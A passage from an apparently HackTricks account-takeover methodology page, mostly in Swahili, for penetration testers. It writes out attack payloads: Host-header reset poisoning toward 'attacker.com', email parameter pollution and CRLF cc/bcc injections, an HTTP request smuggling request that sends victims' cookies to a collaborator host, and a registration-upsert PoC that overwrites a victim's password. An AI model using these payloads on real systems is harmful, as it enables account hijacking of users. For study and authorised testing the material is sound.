def handleResponse(req, interesting): if req.status != 401 and b’Invalid’ not in req.response: table.add(req)

</details>

- Jaribu racing verification: wasilisha OTP sawa halali kwa wakati mmoja katika vikao viwili; wakati mwingine kikao kimoja kinakuwa akaunti ya mshambuliaji iliyothibitishwa wakati mchakato wa mwathirika pia unafanikiwa.
- Pia jaribu Host header poisoning kwenye viungo vya verification (kama reset poisoning hapo chini) ili leak au kukamilisha uthibitisho kwenye host inayodhibitiwa na mshambuliaji.

<a class="content_ref" href="rate-limit-bypass.md"><span class="content_ref_label">Rate Limit Bypass</span></a>

<a class="content_ref" href="2fa-bypass.md"><span class="content_ref_label">2FA/MFA/OTP Bypass</span></a>

<a class="content_ref" href="email-injections.md"><span class="content_ref_label">Email Injections</span></a>

## Account Pre‑Hijacking Techniques (before the victim signs up)

Daraja ya matatizo yenye nguvu hutokea wakati mshambuliaji anafanya vitendo kwenye barua pepe ya mwathirika kabla mwathirika hajaunda akaunti yao, kisha anarudisha upatikanaji baadaye.

Mbinu muhimu za kujaribu (binafsisha kwa mtiririko wa lengo):

- Classic–Federated Merge
- Mshambuliaji: anajisajili akaunti ya classic na barua pepe ya mwathirika na kuweka nywila
- Mwathirika: baadaye anajiandikisha kwa SSO (barua pepe hiyo hiyo)
- Merging zisizo salama zinaweza kuacha pande zote zikiwa zimeingia au kurejesha upatikanaji wa mshambuliaji
- Unexpired Session Identifier
- Mshambuliaji: anaunda akaunti na kuzishikilia session iliyo na uhai mrefu (usiyeondoka)
- Mwathirika: anarejesha/anaweka nywila na kutumia akaunti
- Jaribu kama sessions za zamani zinaendelea kuwa halali baada ya reset au kuwezeshwa MFA
- Trojan Identifier
- Mshambuliaji: anaongeza kitambulisho cha pili kwenye akaunti iliyotengenezwa mapema (simu, barua pepe ya ziada, au kuunganisha IdP ya mshambuliaji)
- Mwathirika: anarekebisha nywila; mshambuliaji baadaye anatumia kitambulisho cha trojan kureseti/kuingia
- Unexpired Email Change
- Mshambuliaji: anaanzisha mabadiliko ya barua pepe kwenda barua pepe ya mshambuliaji na anazuia uthibitisho
- Mwathirika: anarejesha akaunti na inaanza kuitumia
- Mshambuliaji: baadaye anakamilisha mabadiliko ya barua pepe yaliyosubiri ili kuiba akaunti
- Non‑Verifying IdP
- Mshambuliaji: anatumia IdP isiyothibitisha umiliki wa barua pepe ili kudai `victim@…`
- Mwathirika: anajiandikisha kupitia njia ya classic
- Huduma inaunganisha kwa barua pepe bila kukagua `email_verified` au kufanya uthibitisho wa ndani

Practical tips

- Pata mitiririko na endpoints kutoka web/mobile bundles. Tafuta classic signup, kuunganisha SSO, mabadiliko ya barua pepe/simu, na endpoints za password reset.
- Tengeneza otomatishaji halisi ili kuweka sessions zikiendelea kuwa hai wakati unajaribu mitiririko mingine.
- Kwa majaribio ya SSO, anzisha test OIDC provider na toa tokens zenye `email` claims kwa anwani ya mwathirika na `email_verified=false` ili kuangalia kama RP inaamini IdP zisizo thibitishwa.
- Baada ya password reset yoyote au mabadiliko ya barua pepe, hakikisha kwamba:
  - session nyingine zote na tokens zimetenguliwa/haziwezi kutumika tena,
  - uwezo wa mabadiliko ya barua pepe/simu uliokusubiri umeghairiwa,
  - IdPs/barua pepe/simu zilizokuwa zimeunganishwa tayari zinathibitishwa tena.

Note: Extensive methodology and case studies of these techniques are documented by Microsoft’s pre‑hijacking research (see References at the end).

<a class="content_ref" href="reset-password.md"><span class="content_ref_label">Reset/Forgotten Password Bypass</span></a>

<a class="content_ref" href="race-condition.md"><span class="content_ref_label">Race Condition</span></a>

## **Password Reset Takeover**

### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. Omba password reset kwa anwani yako ya barua pepe
2. Bonyeza kiungo cha password reset
3. Usibadilishe nywila
4. Bonyeza tovuti yoyote ya 3rd party (eg: Facebook, twitter)
5. Intersepti ombi katika Burp Suite proxy
6. Kagua kama referer header inakuwa leak password reset token.

### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Intersepti ombi la password reset katika Burp Suite
2. Ongeza au badilisha headers zifuatazo katika Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Tuma ombi ulilobadilisha header\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. Tafuta URL ya password reset inayotegemea _host header_ kama : `https://attacker.com/reset-password.php?token=TOKEN`

### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR kwenye vigezo vya API

1. Mshambuliaji lazima aingie kwa akaunti yake na aende kwenye kipengele cha Badilisha nywila.
2. Anzisha Burp Suite na zuia ombi\
3. Tuma kwenye tab ya repeater na hariri vigezo: User ID/email
   powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

Token dhaifu la kurejesha nywila

Token ya kurejesha nywila inapaswa kuzalishwa kwa nasibu na kuwa ya kipekee kila wakati.
Jaribu kubaini kama token inaisha muda au kama ni ile ile kila mara; katika baadhi ya kesi algorithimu ya uzalishaji ni dhaifu na inaweza kukadiriwa. Vigezo vifuatavyo vinaweza kutumika na algorithimu.

• Timestamp
• UserID
• Email of User
• Firstname and Lastname
• Date of Birth
• Kriptografia
• Nambari tu
• Mfululizo mdogo wa tokeni (herufi kati ya [A-Z,a-z,0-9])
• Matumizi tena ya tokeni
• Tarehe ya kumalizika kwa tokeni

Leaking Password Reset Token

1. Trigger a password reset request using the API/UI for a specific email e.g: test@mail.com
2. Chunguza majibu ya server na angalia resetToken
3. Kisha tumia token kwenye URL kama https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

Password Reset Via Username Collision

1. Jisajili kwenye mfumo kwa jina la mtumiaji linalofanana na la mwathiriwa, lakini ukiacha nafasi tupu kabla na/au baada ya jina la mtumiaji. mf: "admin "
2. Omba kurejesha nywila ukitumia jina lako la mtumiaji lenye nia mbaya.
3. Tumia token iliyotumwa kwa barua pepe yako na rejesha nywila ya mwathiriwa.
4. Ingia kwenye akaunti ya mwathiriwa kwa nywila mpya.

Jukwaa CTFd liliathiriwa na shambulio hili.
See: CVE-2020-7245

Account Takeover Via Cross Site Scripting

1. Tafuta XSS ndani ya application au subdomain ikiwa cookies zimewekwa kwa domain kuu : *.domain.com
2. Leak the current sessions cookie
3. Thibitisha kama mtumiaji ukitumia cookie

Account Takeover Via HTTP Request Smuggling

1. Tumia smuggler kugundua aina ya HTTP Request Smuggling (CL, TE, CL.TE)
   powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h\
2. Tengeneza ombi litakaloandika POST / HTTP/1.1 kwa data ifuatayo:
   GET http://something.burpcollaborator.net HTTP/1.1 X: lengo likiwa kufanya open redirect wahasiriwa kwenda burpcollab na kuiba cookies zao\
3. Ombi la mwisho linaweza kuonekana kama lifuatalo

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone reports exploiting this bug\

• https://hackerone.com/reports/737140\
• https://hackerone.com/reports/771666

Kuchukua Akaunti kupitia CSRF

1. Tengeneza payload kwa CSRF, mfano: “fomu ya HTML inayojisubmit moja kwa moja kwa ajili ya kubadilisha nywila”
2. Tuma payload

Kuchukua Akaunti kupitia JWT

JSON Web Token inaweza kutumika kuthibitisha mtumiaji.

• Badilisha JWT kwa User ID / Email tofauti
• Angalia saini dhaifu ya JWT

JWT Vulnerabilities (Json Web Tokens)

Registration-as-Reset (Upsert on Existing Email)

Baadhi ya signup handlers hufanya upsert wakati email iliyotolewa tayari ipo. Ikiwa endpoint inakubali minimal body yenye email na password na haitekelezi ownership verification, kutuma email ya mwanaathiriwa kunaweza kuandika password yao upya pre-auth.

• Discovery: kusanya majina ya endpoint kutoka bundled JS (au mobile app traffic), kisha fuzz base paths kama /parents/application/v4/admin/FUZZ kwa kutumia ffuf/dirsearch.
• Vidokezo vya method: GET inayorejesha ujumbe kama “Only POST request is allowed.” mara nyingi inaonyesha verb sahihi na kwamba JSON body inatarajiwa.
• Minimal body iliyoshuhudiwa kwa vitendo:

{"email":"victim@example.com","password":"New@12345"}

Mfano wa PoC:

POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json

{"email":"victim@example.com","password":"New@12345"}

Athari: Full Account Takeover (ATO) bila reset token, OTP, au email verification.

Marejeo

• How I Found a Critical Password Reset Bug (Registration upsert ATO)
• Microsoft MSRC – Pre‑hijacking attacks on web user accounts (May 2022)
• https://salmonsec.com/cheatsheet/account_takeover
• Hey there! You are using WhatsApp: Enumerating Three Billion Accounts for Security and Privacy (NDSS 2026 paper & dataset)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.